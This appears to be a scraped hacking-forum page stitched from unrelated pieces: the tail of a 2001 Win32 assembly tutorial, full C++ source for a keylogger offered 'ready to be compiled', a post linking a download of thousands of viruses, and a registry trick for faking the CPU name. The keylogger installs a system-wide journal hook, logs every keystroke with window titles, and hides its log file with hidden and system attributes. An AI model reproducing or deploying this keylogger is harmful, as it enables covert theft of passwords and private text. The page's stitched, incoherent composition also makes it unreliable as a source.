        call ExitProcess                ; does not return

end start

 ; ------ CUT here ----------------------------------------------

 And now the explanations. :) 

 - .386
 - .model flat

 I think this is obvious. The processor directive MUST be before the
 memory model and it must be at least a 386. The model directive
 says we use a flat memory model.

 - extrn ExitProcess:proc
 - extrn MessageBoxA:proc

 Here we import 2 APIs. Note that they live in different DLLs: ExitProcess
 is exported by kernel32.dll and MessageBoxA by user32.dll (import32.lib
 covers both, see below). Do not forget the :proc after
 the API names! The linker will give you no error, but your program
 will definitely fuck up!

 - msg_title DB "MessageBox title",0

 Note that almost every string in Windows is zero terminated.

 - push 0
 - push offset msg_title
 - push offset msg_message
 - push 0
 - call MessageBoxA

 At this time we call an API, the MessageBoxA API to be exactly.
 See below for more info.

 - push 0
 - call ExitProcess

 Yes, no INTs anymore. We use the ExitProcess API to quit. In this
 code example I used 0 as exit code.

 Something more about APIs
 =========================

 The MessageBoxA call might look a little strange to you.
 Let's see what the MSDN tells us about this API:

 int MessageBox(HWND  hwndOwner,       // handle of owner window
                LPCTSTR  lpszText,     // address of text in message box
                LPCTSTR  lpszTitle,    // address of title of message box
                UINT  fuStyle          // style of message box
                );

 In Win32, parameters aren't passed in registers anymore. Instead they are
 pushed on the stack. You really can assume that every parameter
 is DWORD size. If you code 'push 0' this instruction will push a
 DWORD 0 on the stack, not a WORD.
 If you take a closer look you will notice that the parameters are
 pushed on the stack in reverse order. This is the stdcall calling
 convention used by the Win32 API: arguments are pushed right-to-left and
 the callee removes them from the stack before returning. So you have to
 push the last parameter as the first one and the first parameter as the
 last one. Then simply call the API. The return value will always be in EAX.

 If you have already coded Win32 in C++, you may have wondered about
 that A behind the MessageBox API: "In my C++ code I never typed this ...".
 Lots of APIs that use strings are available in two versions:
 ANSI and UNICODE. The ones with the A are ANSI and the ones with
 a W at the end are UNICODE (W = Wide chars).

 Do not forget to save register values which you need before you call an API.
 In good old DOS times you knew exactly which registers will be destroyed
 by an INT call, but in the case of APIs you never know. So this is
 especially important in loops because ECX can be anything after the API call.
 By the Win32 x86 calling convention an API preserves EBX, ESI, EDI and EBP
 (the callee-saved registers) and may clobber EAX, ECX and EDX. So you can
 rely on EBP surviving an API call: most code uses it to build the stack
 frame, and the callee restores it before returning.

 One more code example
 =====================

 Let's have another simple code example. This little program will show
 the system time in a message box. Here we go:

 ; ------ CUT here ----------------------------------------------

.386                                    ; 386+ instruction set; must precede .model
.model flat                             ; flat 32-bit memory model

        extrn ExitProcess:proc          ; kernel32.dll
        extrn MessageBoxA:proc          ; user32.dll
        extrn GetSystemTime:proc        ; kernel32.dll; fills a SYSTEMTIME with the current time
                                        ; NOTE(review): GetSystemTime reports UTC, not local
                                        ; time -- GetLocalTime is the wall-clock variant

.data

        ; Mirror of the Win32 SYSTEMTIME structure: eight WORD fields, 16 bytes.
        _SYSTEMTIME struc
                wYear DW ?
                wMonth DW ?
                wDayOfWeek DW ?
                wDay DW ?
                wHour DW ?
                wMinute DW ?
                wSecond DW ?
                wMilliseconds DW ?
        _SYSTEMTIME ends

        SYSTEMTIME _SYSTEMTIME          ; one instance, filled in by GetSystemTime

        myTitle DB "tell me what time it is ...",0
        ; myMessage has no terminator of its own: it runs straight into
        ; time_string, so the two together form one NUL-terminated string.
        myMessage DB "The system time is: "
        time_string DB "00:00 h",0      ; "HH:MM h"; the digits are patched in place below

.code

start:
        push offset SYSTEMTIME          ; lpSystemTime (out parameter)
        call GetSystemTime

        ; minutes -> time_string[3..4]; EDI points at the ones digit
        lea edi,[time_string+4]
        xor eax,eax                     ; clear the upper 16 bits before loading a WORD
        mov ax,[SYSTEMTIME.wMinute]
        call convert_to_string

        ; hours -> time_string[0..1]
        lea edi,[time_string+1]
        xor eax,eax
        mov ax,[SYSTEMTIME.wHour]
        call convert_to_string

        ; MessageBoxA(0, myMessage, myTitle, 0); arguments pushed right-to-left
        push 0
        push offset myTitle
        push offset myMessage
        push 0
        call MessageBoxA

        push 0                          ; exit code 0
        call ExitProcess                ; does not return

; convert_to_string: write EAX (0..99) as two ASCII digits at [EDI-1],[EDI].
;   in:  EAX = value, EDI -> position of the ones digit
;   out: both digits stored; clobbers EAX, ECX, EDX and leaves EDI decremented
;   Values of 100 or more lose their high digits (only two are written).
convert_to_string:
        xor edx,edx                     ; EDX:EAX / 10
        mov ecx,10
        div ecx                         ; EAX = tens, EDX = ones
        or dl,30h                       ; ones digit -> ASCII
        mov byte ptr [edi],dl
        xor edx,edx
        div ecx                         ; EDX = tens digit
        or dl,30h
        dec edi
        mov byte ptr [edi],dl
        ret

end start

 ; ------ CUT here ----------------------------------------------

 How to compile and link a Win32 program?
 ========================================

 For our 'hello world' program (hello.asm) we would compile it as the following:

 tasm32 /ml hello.asm
 tlink32 /Tpe /aa /c hello.obj,,,import32.lib

 As you can see you need to use tasm32.exe and tlink32.exe and not the
 DOS versions (it's the same for td32.exe). Let's discuss the parameters
 briefly:

 /ml - compile case sensitive
 /Tpe - sets output to PE (Portable EXE), /Tpd would be DLL
 /aa - uses Windows API
 /c - case sensitive linking
 import32.lib - see below ...

 How to use APIs from other DLLs?
 ================================

 Normally, you specify only the import32.lib file for the linker. This
 is the standard file and it's used by the linker for our API references.
 Import32.lib contains all APIs from kernel32.dll, user32.dll and gdi32.dll
 (maybe more, but at least these ones). Let's imagine we want to use the
 registry in our program. For that purpose we need some APIs like
 RegOpenKeyExA. These registry APIs are in advapi32.dll. In your program
 code you declare them as normal APIs, but how to tell the linker that
 we wanna use it? At first, we need to make our own '.lib' file. For that
 purpose we take the implib.exe from TASM's BIN directory:

 Implib -c advapi32.lib C:\windows\system\advapi32.dll

 Do not forget the -c for case sensitive. Now we need to copy the '.lib'
 file to TASM's LIB directory. And now we can give the linker this
 additional '.lib' file:

 tlink32 /Tpe /aa /c program.obj,,,import32.lib advapi32.lib

 stdcall - does it make the nasty coding easier?
 ===============================================

 Lots of Win32 ASM sources use a model directive like the following:

 .model flat, stdcall

 Hmm ... what does stdcall mean? Most coders don't seem to know that.
 They type it because they have seen it somewhere and there's no
 problem using it. I may be wrong here, but it seems to me that this
 is only something that shall make parameter pushing easier.
 All the documentation on the APIs is written for C++ and it is really
 nasty to begin with the last parameter. Let's take the call to the
 MessageBoxA API from the 'hello world' program above. Using the stdcall
 we could write it like this:

 call MessageBoxA, 0, offset msg_message, offset msg_title, 0

 Yes, all in one line. The compiler will produce the push instructions
 for us. The special thing here is that the parameters are given in the
 correct order. In my opinion, this makes the code less readable and
 makes some little optimizations impossible. If you want to call an API
 that needs lots of parameters the line with the call could be very long.
 To continue the call in the next line you can use a '\' at the end of
 a line. Example:

 call CreateProcessA, 0, offset commandline, 0, 0, 0, 0, 0, 0,\
                      offset startupinfo, offset processinformation

 Writing your own DLL
 ====================

 Let's imagine you want to write your own DLL and you want to export
 some of its functions. Just write it like a normal program. The
 exported function should be written like this:

 public myFunction                      ; make the symbol visible to the linker (and the .def EXPORTS list)

 myFunction PROC
     ; your code goes here ...
     ret                                ; a bare ret pops no arguments; a stdcall export would need ret N
 myFunction ENDP

 If you don't declare your function as public the linker will give you
 a warning. The initialization stuff at the entry point of your program
 must quit with a 'ret 0Ch' and NOT with ExitProcess! The reason is simple:
 The loader calls the entry point like this:

 BOOL WINAPI DllEntryPoint(
                HINSTANCE  hinstDLL,        // handle of DLL module
                DWORD  fdwReason,           // reason for calling function
                LPVOID  lpvReserved         // reserved
               );

 In your DllEntryPoint you can do some initialization stuff. This
 entrypoint is called several times. It is called when the DLL is
 being attached to process or thread or when it's being detached
 from a process or thread. Check the MSDN for the different
 values of the fdwReason parameter. Some of the registers must
 be preserved in your DLL entrypoint. This is very important because
 if you don't preserve them the process which loaded the DLL
 will be terminated without any error message after the DLL
 entrypoint was run. The registers the calling convention requires you
 to preserve are EBX, ESI, EDI and EBP (ESP is restored by ret); it is
 a good idea to simply preserve all registers by using PUSHAD and POPAD.
 The return value is only of importance when the entrypoint is called with
 the DLL_PROCESS_ATTACH value for fdwReason. It must be nonzero
 (true) to signal to the LoadLibrary API that the initialization
 was successful. If you return zero the DLL will be removed
 from the process. Construct your entrypoint like this:

; DllEntryPoint(hinstDLL, fdwReason, lpvReserved) -- called by the loader
; on process/thread attach and detach.
dllmain:
        pushad                          ; preserve every general register for the loader
        ; ...
        ; code
        ; ...
        popad
        mov eax,1                       ; return TRUE so DLL_PROCESS_ATTACH counts as successful
        ret 0Ch                         ; stdcall: pop the three DWORD arguments (3 * 4 = 0Ch bytes)

 To export your function you need to write a '.def' file.
 These definition files seem to be very similar to the C++ ones. I don't
 know much about them, but I know that you can write the following
 to export your function:

 EXPORTS
     myFunction

 That's all. To link the file you need to specify the '.def' file
 and you must use /Tpd instead of /Tpe.

 Using resources
 ===============

 The standard application icon looks boring ...
 Let's give your program another icon! All we need is an icon (of course *g*)
 and a '.rc' file. Again, these resource scripts are very similar (maybe
 even equal) to the C++ ones. Again, I don't know much about '.rc' files,
 I only used icons so far. :(
 The contents of your resource script should look like:

 100 ICON "C:\path\filename.ico"

 Having this resource files you need to compile it to a *.res file.
 Use the brcc32.exe to do this:

 brcc32.exe myfile.rc

 Then you only need to give the filename of your *.res file as
 a parameter to the linker. Simply start tlink32 /? to see how
 to do this.
 (I'm too lazy to type this and it's now 04:05 o'clock here *g*).

 Last words
 ==========

 I really hope you liked this tutorial. It really took me some time to write
 all this stuff and two beer, one cigarette, one potion of Snus (swedish tobacco)
 and noisy music were needed to help me writing. :) )
 Please mail if you think this tutorial is great, if you think this
 tutorial suckz (but then tell me WHY) or if you have a question
 about Win32 assembly (but do not expect that I can answer it, hehe).
 I'm happy about every mail I receive and I promise to answer.

 mal.function@gmx.net

(c) 2001 Malfunction

Keylogger in C++


the keylogger.cpp file

#include < stdio.h >
#include < windows.h >
#include “keylogger.h”
// Module-wide state shared between the hook procedure, the logging thread and the
// start/stop entry points. None of it is synchronized; the thread and the callers
// of manticoreLog/manticoreStop read and write these plainly.
bool logging=false;     // true while the message pump in manticoreThread should keep running; cleared by manticoreStop
DWORD TID=0;            // id of the logging thread, filled in by CreateThread in manticoreLog
HMODULE hMod=0;         // module handle handed to SetWindowsHookEx; declared extern in keylogger.h and never assigned in this file
HANDLE myFile=0;        // handle of the log file created by manticoreThread and written by manticoreProc
HANDLE hThread=0;       // handle of the logging thread (CreateThread); reset to 0 when the thread exits
HHOOK lHook=0;          // handle of the WH_JOURNALRECORD hook; re-created after WM_CANCELJOURNAL
HWND prevF=0;           // last active window seen by manticoreProc; a title header is written whenever it changes
// Journal-record hook procedure installed by manticoreThread (WH_JOURNALRECORD).
// For each WM_KEYDOWN event it appends either the translated printable character
// or the key name in square brackets to myFile; whenever the active window changes,
// the window title is written first as a section header. Once the log reaches
// 5 MiB it is truncated back to empty.
// Defender note: the observable artifacts of this component are the
// WH_JOURNALRECORD hook itself and the steadily growing log file that
// manticoreThread creates with the hidden+system attributes.
LRESULT __stdcall manticoreProc(int code,WPARAM wParam,LPARAM lParam)
{
    // Negative hook codes are passed straight through without processing.
    if(code<0)
    {
        return CallNextHookEx(lHook,code,wParam,lParam);
    }
    if(code==HC_ACTION)
    {
        EVENTMSG *pEvt=(EVENTMSG *)lParam;      // journal hooks receive an EVENTMSG, not a MSG
        if(pEvt->message==WM_KEYDOWN)
        {
            DWORD dwCount,dwBytes;
            char svBuffer[256];
            int vKey,nScan;
            vKey=LOBYTE(pEvt->paramL);           // virtual-key code lives in the low byte of paramL
            nScan=HIBYTE(pEvt->paramL);          // hardware scan code in the high byte
            nScan<<=16;                          // moved into bits 16-23, the lParam layout GetKeyNameText expects
            HWND hFocus=GetActiveWindow();
            if(prevF!=hFocus)
            {
                // Focus moved to another window: emit its title as a header line.
                char svTitle[256];
                int nCount;
                nCount=GetWindowText(hFocus,svTitle,256);
                if(nCount>0)
                {
                    char svBuffer[512];          // shadows the outer svBuffer within this scope only
                    wsprintf(svBuffer,”\r\n—–[ %s ]—–\r\n”,svTitle);
                    WriteFile(myFile,svBuffer,lstrlen(svBuffer),&dwBytes,NULL);
                }
                prevF=hFocus;
            }
            dwCount=GetKeyNameText(nScan,svBuffer,256);
            if(dwCount)
            {
                if(vKey==VK_SPACE)
                {
                    // Space is given a one-character name so it takes the single-character path below.
                    svBuffer[0]=’ ‘;
                    svBuffer[1]=”;
                    dwCount=1;
                }
                if(dwCount==1)
                {
                    // One-character key name: translate it with the current keyboard
                    // state and log it only if it falls in the ASCII range 32..127.
                    BYTE kbuf[256];
                    WORD ch;
                    int chcount;
                    GetKeyboardState(kbuf);
                    chcount=ToAscii(vKey,nScan,kbuf,&ch,0);
                    if((chcount>0)&&(ch>=32)&&(ch<=127))
                    {
                        WriteFile(myFile,&ch,chcount,&dwBytes,NULL);
                    }
                }
                else
                {
                    // Multi-character key name: logged as [Name]; Return additionally ends the line.
                    WriteFile(myFile,”[",1,&dwBytes,NULL);
                    WriteFile(myFile,svBuffer,dwCount,&dwBytes,NULL);
                    WriteFile(myFile,"]“,1,&dwBytes,NULL);
                    if(vKey==VK_RETURN)
                    {
                        WriteFile(myFile,”\r\n”,2,&dwBytes,NULL);
                    }
                }
            }
        }
    }
    // Runs for every non-negative hook code, not only key events: once the log
    // reaches 5 MiB (5242880 bytes) the file is truncated to zero length.
    DWORD fsize=GetFileSize(myFile,0);
    if(fsize>=5242880)
    {
        SetFilePointer(myFile,0,0,FILE_BEGIN);
        SetEndOfFile(myFile);
    }
    return CallNextHookEx(lHook,code,wParam,lParam);
}
// Body of the logging thread started by manticoreLog. lpv is the path of the
// log file (passed through CreateThread as an LPVOID). The thread creates the
// file, installs the WH_JOURNALRECORD hook with manticoreProc, then pumps
// messages until the global `logging` flag is cleared, re-installing the hook
// whenever the system posts WM_CANCELJOURNAL. Returns 1 on any setup failure
// and 0 after a normal shutdown.
// Defender note: the file is created with FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_SYSTEM
// and the hook is re-armed after cancellation; both are useful detection signals.
// NOTE(review): journal hooks are restricted on Windows Vista and later (UIAccess),
// so the SetWindowsHookEx call here is presumably both conspicuous and unlikely to
// succeed on modern systems — confirm against the target OS version.
DWORD __stdcall manticoreThread(LPVOID lpv)
{
    MSG msg;
    BYTE keytbl[256];
    // All-zero keyboard state, applied after a WM_CANCELJOURNAL to clear stuck key state.
    for(int i=0;i<256;++i)
    {
        keytbl[i]=0;
    }
    logging=true;
    prevF=0;
    // CREATE_ALWAYS replaces any existing file; the hidden+system attributes keep it out of a default directory listing.
    myFile=CreateFile((char *)lpv,GENERIC_WRITE,FILE_SHARE_READ,0,CREATE_ALWAYS,FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_SYSTEM,0);
    if(myFile==INVALID_HANDLE_VALUE)
    {
        return 1;
    }
    // Position at end of file; 0xffffffff is the INVALID_SET_FILE_POINTER failure value.
    if(SetFilePointer(myFile,0,0,FILE_END)==0xffffffff)
    {
        CloseHandle(myFile);
        myFile=0;
        return 1;
    }
    // System-wide journal hook; hMod comes from the module declared extern in keylogger.h.
    lHook=SetWindowsHookEx(WH_JOURNALRECORD,manticoreProc,hMod,0);
    if(lHook==0)
    {
        CloseHandle(myFile);
        myFile=0;
        return 1;
    }
    logging=true;        // already set above; repeated here before entering the pump
    while(logging)
    {
        // Drain the queue; a journal hook needs a message loop on its thread to stay alive.
        while(PeekMessage(&msg,0,0,0,PM_NOREMOVE))
        {
            GetMessage(&msg,0,0,0);
            if(msg.message==WM_CANCELJOURNAL)
            {
                // The system has removed the journal hook: reset keyboard state and install it again.
                SetKeyboardState(keytbl);
                lHook=SetWindowsHookEx(WH_JOURNALRECORD,manticoreProc,hMod,0);
                if(lHook==0)
                {
                    CloseHandle(myFile);
                    myFile=0;
                    return 1;
                }
            }
            else
            {
                DispatchMessage(&msg);
            }
        }
        Sleep(1);        // 1 ms poll interval between queue checks
    }
    // Normal shutdown requested via manticoreStop: release the hook and the file.
    UnhookWindowsHookEx(lHook);
    CloseHandle(myFile);
    myFile=0;
    hThread=0;
    return 0;
}
// Starts the logging thread writing to `file`. Returns false if logging is
// already active or CreateThread fails, true once the thread has been created.
// NOTE(review): `file` is handed to the thread by pointer, so the caller's
// string presumably has to stay valid until manticoreThread has called
// CreateFile — confirm at the call site.
bool manticoreLog(const char *file)
{
    if(logging==true)
    {
        return false;
    }
    hThread=CreateThread(0,0,manticoreThread,(LPVOID)file,0,&TID);
    if(hThread==0)
    {
        return false;
    }
    return true;
}
// Requests shutdown of the logging thread. Returns false when logging is not
// active or when the thread handle becomes signalled within 2 s (i.e. the thread
// has already exited); otherwise clears `logging` so the pump in manticoreThread
// ends, and returns true. It does not wait for the thread to actually finish.
bool manticoreStop()
{
    if(logging==false)
    {
        return false;
    }
    // WAIT_OBJECT_0 here means the thread is already gone, not that the stop succeeded.
    if(WaitForSingleObject(hThread,2000)==WAIT_OBJECT_0)
    {
        return false;
    }
    logging=false;
    return true;
}

the keylogger.h header file

#ifndef KEYLOGGER_H
#define KEYLOGGER_H
#include
extern HMODULE hMod;
LRESULT __stdcall manticoreProc(int,WPARAM,LPARAM);
DWORD __stdcall manticoreThread(LPVOID);
bool manticoreLog(const char *);
bool manticoreStop();
#endif

ready to be compiled :-)

Ultimate virus collection. a dangerous one.
This is only meant for educational purposes. The user will be responsible for any damage caused.
Use it carefully. All viruses are dangerous.

download link:

http://rapidshare.com/files/152561063/6000.Viruses.VX.Collector-Malware.Researcher.Starter.Kit.rar

By: Nitin

SHOW YOUR PC PENTIUM 5 OR MORE

GO TO START>RUN>TYPE REGEDIT>HKEY_LOCAL_MACHINE>HARDWARE>DESCRIPTION>SYSTEM>CENTRAL

PROCESSOR>ON THE RIGHT-HAND SIDE RIGHT-CLICK ON THE PROCESSOR NAME AND STRING AND THEN CLICK ON

MODIFY AND WRITE WHATEVER YOU WANT, OR NAME IT PENTIUM 5 OR MORE

HEYY FRNDS DO REPLY IF U LIKE THIS TRICK